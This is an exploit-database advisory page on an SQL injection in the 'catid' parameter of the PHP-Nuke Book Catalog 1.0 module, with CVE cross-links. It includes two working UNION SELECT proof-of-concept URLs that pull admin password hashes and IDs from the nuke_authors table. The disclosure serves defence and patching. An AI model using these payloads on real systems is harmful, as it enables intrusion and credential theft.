Lucene search
H4ckCity Security TeamEDB-ID:32140HistoryAug 01, 2008 - 12:00 a.m.
PHP-Nuke Book Catalog Module 1.0 - 'catid' SQL Injection
2008-08-0100:00:00
H4ckCity Security Team
www.exploit-db.com
15
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/30511/info
The Book Catalog module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,pwd+from+nuke_authors
http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,aid+from+nuke_authorsRelated
nvd
nvd
CVE-2008-3513
2008-08-07 20:41:00
prion
prion
Sql injection
2008-08-07 20:41:00
cve
cve
CVE-2008-3513
2008-08-07 20:41:00
cvelist
cvelist
CVE-2008-3513
2008-08-07 20:00:00